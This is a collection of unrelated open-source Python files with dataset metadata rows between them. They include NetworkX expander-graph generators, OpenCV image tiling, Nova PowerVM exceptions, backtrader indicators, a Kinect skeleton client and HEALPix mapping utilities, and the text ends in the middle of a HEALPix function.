print('Individual vector correct set!\t\t\t\t\t\tSUCCESS')
else:
print('Individual vector not correct set!\t\t\t\t\tFAILED')
sys.exit(0)
print('Test with indiviual keys!\t\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
print('Test for Cookie Output.')
strCookieOutput = oCookie.getCookie().output()
print('Cookie output: ' + strCookieOutput)
if strCookieOutput is None:
print('No Cookie output available!\t\t\t\t\t\tFAILED')
sys.exit(0)
else:
print('Cookie output available!\t\t\t\t\t\tSUCCESS')
print('Salted session ID tests FINISHED')
| mit | 658,591,935,563,263,400 | 42.816993 | 124 | 0.638126 | false |
SpaceGroupUCL/qgisSpaceSyntaxToolkit | esstoolkit/external/networkx/generators/expanders.py | 4 | 6194 | """Provides explicit constructions of expander graphs.
"""
import itertools
import networkx as nx
__all__ = ["margulis_gabber_galil_graph", "chordal_cycle_graph", "paley_graph"]
# Other discrete torus expanders can be constructed by using the following edge
# sets. For more information, see Chapter 4, "Expander Graphs", in
# "Pseudorandomness", by Salil Vadhan.
#
# For a directed expander, add edges from (x, y) to:
#
# (x, y),
# ((x + 1) % n, y),
# (x, (y + 1) % n),
# (x, (x + y) % n),
# (-y % n, x)
#
# For an undirected expander, add the reverse edges.
#
# Also appearing in the paper of Gabber and Galil:
#
# (x, y),
# (x, (x + y) % n),
# (x, (x + y + 1) % n),
# ((x + y) % n, y),
# ((x + y + 1) % n, y)
#
# and:
#
# (x, y),
# ((x + 2*y) % n, y),
# ((x + (2*y + 1)) % n, y),
# ((x + (2*y + 2)) % n, y),
# (x, (y + 2*x) % n),
# (x, (y + (2*x + 1)) % n),
# (x, (y + (2*x + 2)) % n),
#
def margulis_gabber_galil_graph(n, create_using=None):
r"""Returns the Margulis-Gabber-Galil undirected MultiGraph on `n^2` nodes.
The undirected MultiGraph is regular with degree `8`. Nodes are integer
pairs. The second-largest eigenvalue of the adjacency matrix of the graph
is at most `5 \sqrt{2}`, regardless of `n`.
Parameters
----------
n : int
Determines the number of nodes in the graph: `n^2`.
create_using : NetworkX graph constructor, optional (default MultiGraph)
Graph type to create. If graph instance, then cleared before populated.
Returns
-------
G : graph
The constructed undirected multigraph.
Raises
------
NetworkXError
If the graph is directed or not a multigraph.
"""
G = nx.empty_graph(0, create_using, default=nx.MultiGraph)
if G.is_directed() or not G.is_multigraph():
msg = "`create_using` must be an undirected multigraph."
raise nx.NetworkXError(msg)
for (x, y) in itertools.product(range(n), repeat=2):
for (u, v) in (
((x + 2 * y) % n, y),
((x + (2 * y + 1)) % n, y),
(x, (y + 2 * x) % n),
(x, (y + (2 * x + 1)) % n),
):
G.add_edge((x, y), (u, v))
G.graph["name"] = f"margulis_gabber_galil_graph({n})"
return G
def chordal_cycle_graph(p, create_using=None):
"""Returns the chordal cycle graph on `p` nodes.
The returned graph is a cycle graph on `p` nodes with chords joining each
vertex `x` to its inverse modulo `p`. This graph is a (mildly explicit)
3-regular expander [1]_.
`p` *must* be a prime number.
Parameters
----------
p : a prime number
The number of vertices in the graph. This also indicates where the
chordal edges in the cycle will be created.
create_using : NetworkX graph constructor, optional (default=nx.Graph)
Graph type to create. If graph instance, then cleared before populated.
Returns
-------
G : graph
The constructed undirected multigraph.
Raises
------
NetworkXError
If `create_using` indicates directed or not a multigraph.
References
----------
.. [1] Theorem 4.4.2 in A. Lubotzky. "Discrete groups, expanding graphs and
invariant measures", volume 125 of Progress in Mathematics.
Birkhäuser Verlag, Basel, 1994.
"""
G = nx.empty_graph(0, create_using, default=nx.MultiGraph)
if G.is_directed() or not G.is_multigraph():
msg = "`create_using` must be an undirected multigraph."
raise nx.NetworkXError(msg)
for x in range(p):
left = (x - 1) % p
right = (x + 1) % p
# Here we apply Fermat's Little Theorem to compute the multiplicative
# inverse of x in Z/pZ. By Fermat's Little Theorem,
#
# x^p = x (mod p)
#
# Therefore,
#
# x * x^(p - 2) = 1 (mod p)
#
# The number 0 is a special case: we just let its inverse be itself.
chord = pow(x, p - 2, p) if x > 0 else 0
for y in (left, right, chord):
G.add_edge(x, y)
G.graph["name"] = f"chordal_cycle_graph({p})"
return G
def paley_graph(p, create_using=None):
"""Returns the Paley (p-1)/2-regular graph on p nodes.
The returned graph is a graph on Z/pZ with edges between x and y
if and only if x-y is a nonzero square in Z/pZ.
If p = 1 mod 4, -1 is a square in Z/pZ and therefore x-y is a square if and
only if y-x is also a square, i.e the edges in the Paley graph are symmetric.
If p = 3 mod 4, -1 is not a square in Z/pZ and therefore either x-y or y-x
is a square in Z/pZ but not both.
Note that a more general definition of Paley graphs extends this construction
to graphs over q=p^n vertices, by using the finite field F_q instead of Z/pZ.
This construction requires to compute squares in general finite fields and is
not what is implemented here (i.e paley_graph(25) does not return the true
Paley graph associated with 5^2).
Parameters
----------
p : int, an odd prime number.
create_using : NetworkX graph constructor, optional (default=nx.Graph)
Graph type to create. If graph instance, then cleared before populated.
Returns
-------
G : graph
The constructed directed graph.
Raises
------
NetworkXError
If the graph is a multigraph.
References
----------
Chapter 13 in B. Bollobas, Random Graphs. Second edition.
Cambridge Studies in Advanced Mathematics, 73.
Cambridge University Press, Cambridge (2001).
"""
G = nx.empty_graph(0, create_using, default=nx.DiGraph)
if G.is_multigraph():
msg = "`create_using` cannot be a multigraph."
raise nx.NetworkXError(msg)
# Compute the squares in Z/pZ.
# Make it a set to uniquify (there are exactly (p-1)/2 squares in Z/pZ
# when is prime).
square_set = {(x ** 2) % p for x in range(1, p) if (x ** 2) % p != 0}
for x in range(p):
for x2 in square_set:
G.add_edge(x, (x + x2) % p)
G.graph["name"] = f"paley({p})"
return G
| gpl-3.0 | 6,139,182,787,235,020,000 | 29.658416 | 81 | 0.585015 | false |
nkmk/python-snippets | notebook/opencv_hconcat_vconcat_np_tile.py | 1 | 2317 | import cv2
import numpy as np
im1 = cv2.imread('data/src/lena.jpg')
im2 = cv2.imread('data/src/rocket.jpg')
im_v = cv2.vconcat([im1, im1])
cv2.imwrite('data/dst/opencv_vconcat.jpg', im_v)
# True
im_v_np = np.tile(im1, (2, 1, 1))
cv2.imwrite('data/dst/opencv_vconcat_np.jpg', im_v_np)
# True
def vconcat_resize_min(im_list, interpolation=cv2.INTER_CUBIC):
w_min = min(im.shape[1] for im in im_list)
im_list_resize = [cv2.resize(im, (w_min, int(im.shape[0] * w_min / im.shape[1])), interpolation=interpolation)
for im in im_list]
return cv2.vconcat(im_list_resize)
im_v_resize = vconcat_resize_min([im1, im2, im1])
cv2.imwrite('data/dst/opencv_vconcat_resize.jpg', im_v_resize)
# True
im_h = cv2.hconcat([im1, im1])
cv2.imwrite('data/dst/opencv_hconcat.jpg', im_h)
# True
im_h_np = np.tile(im1, (1, 2, 1))
cv2.imwrite('data/dst/opencv_hconcat_np.jpg', im_h_np)
# True
def hconcat_resize_min(im_list, interpolation=cv2.INTER_CUBIC):
h_min = min(im.shape[0] for im in im_list)
im_list_resize = [cv2.resize(im, (int(im.shape[1] * h_min / im.shape[0]), h_min), interpolation=interpolation)
for im in im_list]
return cv2.hconcat(im_list_resize)
im_h_resize = hconcat_resize_min([im1, im2, im1])
cv2.imwrite('data/dst/opencv_hconcat_resize.jpg', im_h_resize)
# True
def concat_tile(im_list_2d):
return cv2.vconcat([cv2.hconcat(im_list_h) for im_list_h in im_list_2d])
im1_s = cv2.resize(im1, dsize=(0, 0), fx=0.5, fy=0.5)
im_tile = concat_tile([[im1_s, im1_s, im1_s, im1_s],
[im1_s, im1_s, im1_s, im1_s],
[im1_s, im1_s, im1_s, im1_s]])
cv2.imwrite('data/dst/opencv_concat_tile.jpg', im_tile)
# True
im_tile_np = np.tile(im1_s, (3, 4, 1))
cv2.imwrite('data/dst/opencv_concat_tile_np.jpg', im_tile_np)
# True
def concat_tile_resize(im_list_2d, interpolation=cv2.INTER_CUBIC):
im_list_v = [hconcat_resize_min(im_list_h, interpolation=cv2.INTER_CUBIC) for im_list_h in im_list_2d]
return vconcat_resize_min(im_list_v, interpolation=cv2.INTER_CUBIC)
im_tile_resize = concat_tile_resize([[im1],
[im1, im2, im1, im2, im1],
[im1, im2, im1]])
cv2.imwrite('data/dst/opencv_concat_tile_resize.jpg', im_tile_resize)
# True
| mit | 5,698,015,391,255,300,000 | 34.646154 | 114 | 0.632283 | false |
shootstar/novatest | nova/virt/powervm/exception.py | 1 | 2438 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import exception
class PowerVMConnectionFailed(exception.NovaException):
message = _('Connection to PowerVM manager failed')
class PowerVMFileTransferFailed(exception.NovaException):
message = _("File '%(file_path)s' transfer to PowerVM manager failed")
class PowerVMFTPTransferFailed(PowerVMFileTransferFailed):
message = _("FTP %(ftp_cmd)s from %(source_path)s to %(dest_path)s failed")
class PowerVMLPARInstanceNotFound(exception.InstanceNotFound):
message = _("LPAR instance '%(instance_name)s' could not be found")
class PowerVMLPARCreationFailed(exception.NovaException):
message = _("LPAR instance '%(instance_name)s' creation failed")
class PowerVMNoSpaceLeftOnVolumeGroup(exception.NovaException):
message = _("No space left on any volume group")
class PowerVMLPARAttributeNotFound(exception.NovaException):
pass
class PowerVMLPAROperationTimeout(exception.NovaException):
message = _("Operation '%(operation)s' on "
"LPAR '%(instance_name)s' timed out")
class PowerVMImageCreationFailed(exception.NovaException):
message = _("Image creation failed on PowerVM")
class PowerVMInsufficientFreeMemory(exception.NovaException):
message = _("Insufficient free memory on PowerVM system to spawn instance "
"'%(instance_name)s'")
class PowerVMInsufficientCPU(exception.NovaException):
message = _("Insufficient available CPUs on PowerVM system to spawn "
"instance '%(instance_name)s'")
class PowerVMLPARInstanceCleanupFailed(exception.NovaException):
message = _("PowerVM LPAR instance '%(instance_name)s' cleanup failed")
class PowerVMUnrecognizedRootDevice(exception.NovaException):
message = _("Unrecognized root disk information: '%(disk_info)s'")
| apache-2.0 | 9,210,342,643,580,613,000 | 32.861111 | 79 | 0.73872 | false |
joaduo/python-simplerpc | simplerpc/expose_api/javascript/TemplatesCollector.py | 1 | 1940 | # -*- coding: utf-8 -*-
'''
Simple RPC
Copyright (c) 2013, Joaquin G. Duo
'''
from simplerpc.base.SimpleRpcLogicBase import SimpleRpcLogicBase
from simplerpc.common.path import joinPath, splitPath
import os
from simplerpc.common.FileManager import FileManager
import fnmatch
class TemplatesCollector(SimpleRpcLogicBase):
'''
Collects templates into stores in the repository
to be used in the translation by the TranslationAstNode class.
'''
def __post_init__(self):
self.file_manager = FileManager(self.context)
def _getRepoPath(self, templates_set):
return joinPath(os.path.dirname(__file__), templates_set)
def _getTemplatesPaths(self, pattern, templates_set):
for root, _, files in os.walk(self._getRepoPath(templates_set),
followlinks=True):
for basename in files:
if fnmatch.fnmatch(basename, pattern):
filename = os.path.join(root, basename)
yield filename
def _buildNamespace(self, file_path, templates_set):
repo_split = splitPath(self._getRepoPath(templates_set))
namespace, _ = os.path.splitext(file_path)
namespace = splitPath(namespace)[len(repo_split):]
return '.'.join(namespace)
def collectBuiltIn(self, templates_set='javascript_templates'):
templates = dict()
for file_path in self._getTemplatesPaths('*.js', templates_set):
namespace = self._buildNamespace(file_path, templates_set)
template = self.file_manager.getTextFile(file_path)
templates[namespace] = template
return templates
def smokeTestModule():
from simplerpc.context.SimpleRpcContext import SimpleRpcContext
context = SimpleRpcContext('smoke test')
templates = TemplatesCollector(context).collectBuiltIn()
context.log(templates)
if __name__ == "__main__":
smokeTestModule()
| bsd-3-clause | -4,199,961,447,003,559,400 | 36.307692 | 72 | 0.665979 | false |
mementum/backtrader | backtrader/indicators/mabase.py | 1 | 2719 | #!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015-2020 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from ..utils.py3 import with_metaclass
from . import Indicator
class MovingAverage(object):
'''MovingAverage (alias MovAv)
A placeholder to gather all Moving Average Types in a single place.
Instantiating a SimpleMovingAverage can be achieved as follows::
sma = MovingAverage.Simple(self.data, period)
Or using the shorter aliases::
sma = MovAv.SMA(self.data, period)
or with the full (forwards and backwards) names:
sma = MovAv.SimpleMovingAverage(self.data, period)
sma = MovAv.MovingAverageSimple(self.data, period)
'''
_movavs = []
@classmethod
def register(cls, regcls):
if getattr(regcls, '_notregister', False):
return
cls._movavs.append(regcls)
clsname = regcls.__name__
setattr(cls, clsname, regcls)
clsalias = ''
if clsname.endswith('MovingAverage'):
clsalias = clsname.split('MovingAverage')[0]
elif clsname.startswith('MovingAverage'):
clsalias = clsname.split('MovingAverage')[1]
if clsalias:
setattr(cls, clsalias, regcls)
class MovAv(MovingAverage):
pass # alias
class MetaMovAvBase(Indicator.__class__):
# Register any MovingAverage with the placeholder to allow the automatic
# creation of envelopes and oscillators
def __new__(meta, name, bases, dct):
# Create the class
cls = super(MetaMovAvBase, meta).__new__(meta, name, bases, dct)
MovingAverage.register(cls)
# return the class
return cls
class MovingAverageBase(with_metaclass(MetaMovAvBase, Indicator)):
params = (('period', 30),)
plotinfo = dict(subplot=False)
| gpl-3.0 | -6,185,863,034,770,103,000 | 28.879121 | 79 | 0.634792 | false |
ThomasYeoLab/CBIG | stable_projects/fMRI_dynamics/Kong2021_pMFM/part1_pMFM_main/scripts/CBIG_pMFM_step3_test_main.py | 1 | 4066 | # /usr/bin/env python
'''
Written by Kong Xiaolu and CBIG under MIT license:
https://github.com/ThomasYeoLab/CBIG/blob/master/LICENSE.md
'''
import os
import numpy as np
import torch
import CBIG_pMFM_basic_functions_main as fc
import warnings
def CBIG_mfm_test_desikan_main(gpu_index=0):
'''
This function is to implement the testing processes of mean field
model.
The objective function is the summation of FC correlation cost and
FCD KS statistics cost.
Args:
gpu_index: index of gpu used for optimization
Returns:
None
'''
# Setting random seed and GPU
torch.cuda.set_device(gpu_index)
torch.cuda.manual_seed(1)
# Create output folder
input_path = '../output/step2_validation_results/'
output_path = '../output/step3_test_results/'
if not os.path.isdir(output_path):
os.makedirs(output_path)
# Setting hyper-parameters
n_set = 100
n_dup = 10
n_node = 68
vali_raw_all = np.zeros((3 * n_node + 1 + 8, 1))
for i in range(1, 11):
load_file = 'random_initialization_' + str(i) + '.csv'
load_path = os.path.join(input_path, load_file)
xmin = fc.csv_matrix_read(load_path)
index_mat = np.zeros((2, xmin.shape[1]))
index_mat[0, :] = i
index_mat[1, :] = np.arange(xmin.shape[1])
xmin = np.concatenate((index_mat, xmin), axis=0)
vali_raw_all = np.concatenate((vali_raw_all, xmin), axis=1)
vali_raw_all = vali_raw_all[:, 1:]
vali_index = np.argsort(vali_raw_all[7, :])
vali_sort_all = vali_raw_all[:, vali_index]
vali_sel_num = 10
i = 0
vali_sel = np.zeros((vali_raw_all.shape[0], vali_sel_num))
p = 0
p_set = np.zeros(vali_sel_num)
while i < vali_sel_num and p < vali_raw_all.shape[1]:
corr_t = np.zeros(vali_sel_num, dtype=bool)
corr_tr = np.zeros((vali_sel_num, 3))
for j in range(vali_sel_num):
w_corr = np.corrcoef(vali_sel[8:8 + n_node, j:j + 1].T,
vali_sort_all[8:8 + n_node, p:p + 1].T)
i_corr = np.corrcoef(
vali_sel[8 + n_node:8 + 2 * n_node, j:j + 1].T,
vali_sort_all[8 + n_node:8 + 2 * n_node, p:p + 1].T)
s_corr = np.corrcoef(vali_sel[9 + 2 * n_node:, j:j + 1].T,
vali_sort_all[9 + 2 * n_node:, p:p + 1].T)
corr_tr[j, 0] = w_corr[0, 1]
corr_tr[j, 1] = i_corr[0, 1]
corr_tr[j, 2] = s_corr[0, 1]
for k in range(vali_sel_num):
corr_t[k] = (corr_tr[k, :] > 0.98).all()
if not corr_t.any():
vali_sel[:, i] = vali_sort_all[:, p]
p_set[i] = p
i += 1
p += 1
result_save = np.zeros((3 * n_node + 1 + 11, vali_sel_num))
result_save[0:8, :] = vali_sel[0:8, :]
result_save[11:, :] = vali_sel[8:, :]
for j in range(vali_sel_num):
test_cost = np.zeros((3, n_set * 10))
for k in range(10):
arx = np.tile(vali_sel[8:, j:j + 1], [1, n_set])
total_cost, fc_cost, fcd_cost = fc.CBIG_combined_cost_test(
arx, n_dup)
test_cost[0, n_set * k:n_set * (k + 1)] = fc_cost
test_cost[1, n_set * k:n_set * (k + 1)] = fcd_cost
test_cost[2, n_set * k:n_set * (k + 1)] = total_cost
test_file = os.path.join(output_path,
'test_num_' + str(j + 1) + '.csv')
np.savetxt(test_file, test_cost, delimiter=',')
result_save[8, j] = np.nanmean(test_cost[0, :])
result_save[9, j] = np.nanmean(test_cost[1, :])
result_save[10, j] = np.nanmean(test_cost[2, :])
print('**************** finish top ' + str(j + 1) +
' test ****************')
test_file_all = os.path.join(output_path, 'test_all.csv')
np.savetxt(test_file_all, result_save, delimiter=',')
if __name__ == '__main__':
warnings.filterwarnings("ignore", category=RuntimeWarning)
CBIG_mfm_test_desikan_main()
| mit | 5,791,501,326,076,712,000 | 33.752137 | 75 | 0.528283 | false |
coin-or/oBB | obb/gcest.py | 1 | 2698 | from __future__ import division
# Use the third order derivative tensor Gershgorin estimation method
def gcest(LT,UT,method):
# Get dimension
D = LT.shape[0]
# # Positivity/ Negativity tensor checks
# from numpy import all
# print('LT non-positive: %s') % all(LT <= 0)
# print('UT non-negative: %s') % all(UT >= 0)
#
# # Ediag check ef
# print('MA non-positive: %s') % all((UT+LT)/2 <= 0)
# print('RA non-negative: %s') % all((UT-LT)/2 >= 0)
# Gershgorin
# mRA = (UT-LT)/2. # radius tensor.
# mMA = (UT+LT)/2. # midpoint tensor
# for i in range(0,D):
# for j in range(0,D):
# for k in range(0,D):
# if((i==j)and(j==k)):
# mRA[i,j,k] = 0
# mMA[i,j,k] = LT[i,j,k]
# print('mMA non-positive: %s') % all(mMA <= 0)
# print('mRA non-negative: %s') % all(mRA >= 0)
#
# # lbH check (equivalent to Gersh like quad?)
# NRA = (LT-UT)/2.
# rs = (NRA.sum(axis=1)).sum(axis=1)
# A = (LT+UT)/2.
# for i in range(0,D):
# for j in range(0,D):
# for k in range(0,D):
# if((i==j)and(j==k)):
# A[i,j,k] = LT[i,j,k] + (rs[i] - NRA[i,j,k])
# print('lbH non-positive: %s') % all(A <= 0)
# Select estimation method (gc, c)
# Gershgorin for Tensors
if(method == 'gc'):
# Imports
from numpy import maximum, zeros
# Calculate max absolute value of bounds
VT = maximum(abs(LT),abs(UT))
# Get row plane sums
rs = (VT.sum(axis=1)).sum(axis=1)
# Tensor diagonal function
def diagt(T):
v = zeros(D)
for i in range(0,D):
v[i] = T[i,i,i]
return v
# Calculate lower bounds on Gershgorin disks
G = diagt(LT) - (rs-diagt(VT))
# Calculate Gershgorin lower bound
k = min(G)
# If k negative ok, if k positive need other bound
if(k < 0):
pass
#print('k ok, negative')
else:
#print('k positive, using other bound.')
k = (D**(-0.5))*k
return k
# Lh = norm_F(VT) so return -Lh
elif(method == 'c'):
# Imports
from numpy import maximum, sqrt, sum
# Calculate max absolute value of bounds
VT = maximum(abs(LT),abs(UT))
# Calculate frobenius norm of VT
return -sqrt(sum(sum(sum(VT ** 2))))
else:
raise RuntimeError('Method must be one of gc, c.')
| lgpl-3.0 | 7,594,793,938,175,760,000 | 29.659091 | 79 | 0.467754 | false |
Nander2/pypot_herkulex | pypot/sensor/kinect/sensor.py | 1 | 3754 | """
This code has been developed by Baptiste Busch: https://github.com/buschbapti
This module allows you to retrieve Skeleton information from a Kinect device.
It is only the client side of a zmq client/server application.
The server part can be found at: https://bitbucket.org/buschbapti/kinectserver/src
It used the Microsoft Kinect SDK and thus only work on Windows.
Of course, the client side can be used on any platform.
"""
import zmq
import numpy
import threading
from collections import namedtuple
from ...utils import Point3D, Point2D, Quaternion
torso_joints = ('hip_center', 'spine', 'shoulder_center', 'head')
left_arm_joints = ('shoulder_left', 'elbow_left', 'wrist_left', 'hand_left')
right_arm_joints = ('shoulder_right', 'elbow_right', 'wrist_right', 'hand_right')
left_leg_joints = ('hip_left', 'knee_left', 'ankle_left', 'foot_left')
right_leg_joints = ('hip_right', 'knee_right', 'ankle_right', 'foot_right')
skeleton_joints = torso_joints + left_arm_joints + right_arm_joints + left_leg_joints + right_leg_joints
class Skeleton(namedtuple('Skeleton', ('timestamp', 'user_id') + skeleton_joints)):
joints = skeleton_joints
Joint = namedtuple('Joint', ('position', 'orientation', 'pixel_coordinate'))
class KinectSensor(object):
def __init__(self, addr, port):
self._lock = threading.Lock()
self._skeleton = {}
self.context = zmq.Context()
self.sub_skel = self.context.socket(zmq.SUB)
self.sub_skel.connect('tcp://{}:{}'.format(addr, port))
self.sub_skel.setsockopt(zmq.SUBSCRIBE, '')
t = threading.Thread(target=self.get_skeleton)
t.daemon = True
t.start()
def remove_user(self,user_index):
with self._lock:
del self._skeleton[user_index]
def remove_all_users(self):
with self._lock:
self._skeleton = {}
@property
def tracked_skeleton(self):
with self._lock:
return self._skeleton
@tracked_skeleton.setter
def tracked_skeleton(self, skeleton):
with self._lock:
self._skeleton[skeleton.user_id] = skeleton
def get_skeleton(self):
while True:
md = self.sub_skel.recv_json()
msg = self.sub_skel.recv()
skel_array = numpy.fromstring(msg, dtype=float, sep=",")
skel_array = skel_array.reshape(md['shape'])
nb_joints = md['shape'][0]
joints = []
for i in range(nb_joints):
x, y, z, w = skel_array[i][0:4]
position = Point3D(x / w, y / w, z / w)
pixel_coord = Point2D(*skel_array[i][4:6])
orientation = Quaternion(*skel_array[i][6:10])
joints.append(Joint(position,orientation,pixel_coord))
self.tracked_skeleton = Skeleton(md['timestamp'], md['user_index'], *joints)
def run(self):
cv2.startWindowThread()
while True:
img = numpy.zeros((480, 640, 3))
skeleton = kinect.tracked_skeleton
if skeleton:
for user,skel in skeleton.iteritems():
for joint_name in skel.joints:
x, y = getattr(skel, joint_name).pixel_coordinate
pt = (int(x),int(y))
cv2.circle(img, pt, 5, (255, 255, 255), thickness=-1)
kinect.remove_all_users()
cv2.imshow('Skeleton', img)
cv2.waitKey(50)
self.sub_skel.close()
self.context.term()
if __name__ == '__main__':
import cv2
kinect = KinectSensor('193.50.110.177', 9999)
kinect.run()
| gpl-3.0 | 4,152,207,849,554,016,000 | 32.759259 | 104 | 0.579382 | false |
legacysurvey/pipeline | validationtests/quicksipManera3.py | 1 | 51044 | from math import *
import numpy as np
import healpy as hp
import astropy.io.fits as pyfits
import time
import matplotlib.pyplot as plt
from multiprocessing import Pool
from multiprocessing.dummy import Pool as ThreadPool
import numpy.random
import os, errno
import subprocess
twopi = 2.*pi
piover2 = .5*pi
verbose = False
# ---------------------------------------------------------------------------------------- #
def quicksipVerbose(verb=False):
global verbose
verbose=verb
# Make directory
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
# Some unit definitions
arcsec_to_radians = 0.0000048481368111
degree_to_arcsec = 3600.0
# MarcM Global variable to debug
#nwrong = 0
# ---------------------------------------------------------------------------------------- #
# Write partial Healpix map to file
# indices are the indices of the pixels to be written
# values are the values to be written
def write_partial_map(filename, indices, values, nside, nest=False):
fitsformats = [hp.fitsfunc.getformat(np.int32), hp.fitsfunc.getformat(np.float32)]
column_names = ['PIXEL', 'SIGNAL']
# maps must have same length
assert len(set((len(indices), len(values)))) == 1, "Indices and values must have same length"
if nside < 0:
raise ValueError('Invalid healpix map : wrong number of pixel')
firstpix = np.min(indices)
lastpix = np.max(indices)
npix = np.size(indices)
cols=[]
for cn, mm, fm in zip(column_names, [indices, values], fitsformats):
cols.append(pyfits.Column(name=cn, format='%s' % fm, array=mm))
if False: # Deprecated : old way to create table with pyfits before v3.3
tbhdu = pyfits.new_table(cols)
else:
tbhdu = pyfits.BinTableHDU.from_columns(cols)
# add needed keywords
tbhdu.header['PIXTYPE'] = ('HEALPIX','HEALPIX pixelisation')
if nest: ordering = 'NESTED'
else: ordering = 'RING'
tbhdu.header['ORDERING'] = (ordering, 'Pixel ordering scheme, either RING or NESTED')
tbhdu.header['EXTNAME'] = ('xtension', 'name of this binary table extension')
tbhdu.header['NSIDE'] = (nside,'Resolution parameter of HEALPIX')
tbhdu.header['FIRSTPIX'] = (firstpix, 'First pixel # (0 based)')
tbhdu.header['OBS_NPIX'] = npix
tbhdu.header['GRAIN'] = 1
tbhdu.header['OBJECT'] = 'PARTIAL'
tbhdu.header['INDXSCHM'] = ('EXPLICIT', 'Indexing: IMPLICIT or EXPLICIT')
tbhdu.writeto(filename,clobber=True)
subprocess.call("gzip -f "+filename,shell=True)
# ---------------------------------------------------------------------------------------- #
# Find healpix ring number from z
def ring_num(nside, z, shift=0):
# ring = ring_num(nside, z [, shift=])
# returns the ring number in {1, 4*nside-1}
# from the z coordinate
# usually returns the ring closest to the z provided
# if shift = -1, returns the ring immediatly north (of smaller index) of z
# if shift = 1, returns the ring immediatly south (of smaller index) of z
my_shift = shift * 0.5
# equatorial
iring = np.round( nside*(2.0 - 1.5*z) + my_shift )
if (z > 2./3.):
iring = np.round( nside * np.sqrt(3.0*(1.0-z)) + my_shift )
if (iring == 0):
iring = 1
# south cap
if (z < -2./3.):
iring = np.round( nside * np.sqrt(3.0*(1.0+z)) - my_shift )
if (iring == 0):
iring = 1
iring = int(4*nside - iring)
# return ring number
return int(iring)
# ---------------------------------------------------------------------------------------- #
# returns the z coordinate of ring ir for Nside
def ring2z (nside, ir):
fn = float(nside)
if (ir < nside): # north cap
tmp = float(ir)
z = 1.0 - (tmp * tmp) / (3.0 * fn * fn)
elif (ir < 3*nside): # tropical band
z = float( 2*nside-ir ) * 2.0 / (3.0 * fn)
else: # polar cap (south)
tmp = float(4*nside - ir )
z = - 1.0 + (tmp * tmp) / (3.0 * fn * fn)
# return z
return z
# ---------------------------------------------------------------------------------------- #
def ang2pix_ring_ir(nside,ir,phi):
# c=======================================================================
# c gives the pixel number ipix (RING)
# c corresponding to angles theta and phi
# c=======================================================================
z = ring2z (nside, ir)
z0=2.0/3.0
za = fabs(z)
if phi >= twopi:
phi = phi - twopi
if phi < 0.:
phi = phi + twopi
tt = phi / piover2#;// ! in [0,4)
nl2 = 2*nside
nl4 = 4*nside
ncap = nl2*(nside-1)#// ! number of pixels in the north polar cap
npix = 12*nside*nside
if za <= z0:# {
jp = int(floor(nside*(0.5 + tt - z*0.75)))#; /*index of ascending edge line*/
jm = int(floor(nside*(0.5 + tt + z*0.75)))#; /*index of descending edge line*/
#ir = nside + 1 + jp - jm#;// ! in {1,2n+1} (ring number counted from z=2/3)
kshift = 0
if fmod(ir,2)==0.:
kshift = 1#;// ! kshift=1 if ir even, 0 otherwise
ip = int(floor( ( jp+jm - nside + kshift + 1 ) / 2 ) + 1)#;// ! in {1,4n}
if ip>nl4:
ip = ip - nl4
ipix1 = ncap + nl4*(ir-1) + ip
else:
tp = tt - floor(tt)#;// !MOD(tt,1.d0)
tmp = sqrt( 3.*(1. - za) )
jp = int(floor( nside * tp * tmp ))#;// ! increasing edge line index
jm = int(floor( nside * (1. - tp) * tmp ))#;// ! decreasing edge line index
#ir = jp + jm + 1#;// ! ring number counted from the closest pole
ip = int(floor( tt * ir ) + 1)#;// ! in {1,4*ir}
if ip>4*ir:
ip = ip - 4*ir
ipix1 = 2*ir*(ir-1) + ip
if z<=0.:
ipix1 = npix - 2*ir*(ir+1) + ip
return ipix1 - 1
# gives the list of Healpix pixels contained in [phi_low, phi_hi]
def in_ring_simp(nside, iz, phi_low, phi_hi, conservative=True):
pixmin = int(ang2pix_ring_ir(nside,iz,phi_low))
pixmax = int(ang2pix_ring_ir(nside,iz,phi_hi))
if pixmax < pixmin:
pixmin1 = pixmax
pixmax = pixmin
pixmin = pixmin1
listir = np.arange(pixmin, pixmax)
return listir
# gives the list of Healpix pixels contained in [phi_low, phi_hi]
def in_ring(nside, iz, phi_low, phi_hi, conservative=True):
# nir is the number of pixels found
# if no pixel is found, on exit nir =0 and result = -1
if phi_hi-phi_low == 0:
return -1
npix = hp.nside2npix(nside)
ncap = 2*nside*(nside-1) # number of pixels in the north polar cap
listir = -1
nir = 0
# identifies ring number
if ((iz >= nside) and (iz <= 3*nside)): # equatorial region
ir = iz - nside + 1 # in {1, 2*nside + 1}
ipix1 = ncap + 4*nside*(ir-1) # lowest pixel number in the ring
ipix2 = ipix1 + 4*nside - 1 # highest pixel number in the ring
kshift = ir % 2
nr = nside*4
else:
if (iz < nside): # north pole
ir = iz
ipix1 = 2*ir*(ir-1) # lowest pixel number in the ring
ipix2 = ipix1 + 4*ir - 1 # highest pixel number in the ring
else: # south pole
ir = 4*nside - iz
ipix1 = npix - 2*ir*(ir+1) # lowest pixel number in the ring
ipix2 = ipix1 + 4*ir - 1 # highest pixel number in the ring
nr = int(ir*4)
kshift = 1
twopi = 2.*np.pi
shift = kshift * .5
if conservative:
# conservative : include every intersected pixels,
# even if pixel CENTER is not in the range [phi_low, phi_hi]
ip_low = round (nr * phi_low / twopi - shift)
ip_hi = round (nr * phi_hi / twopi - shift)
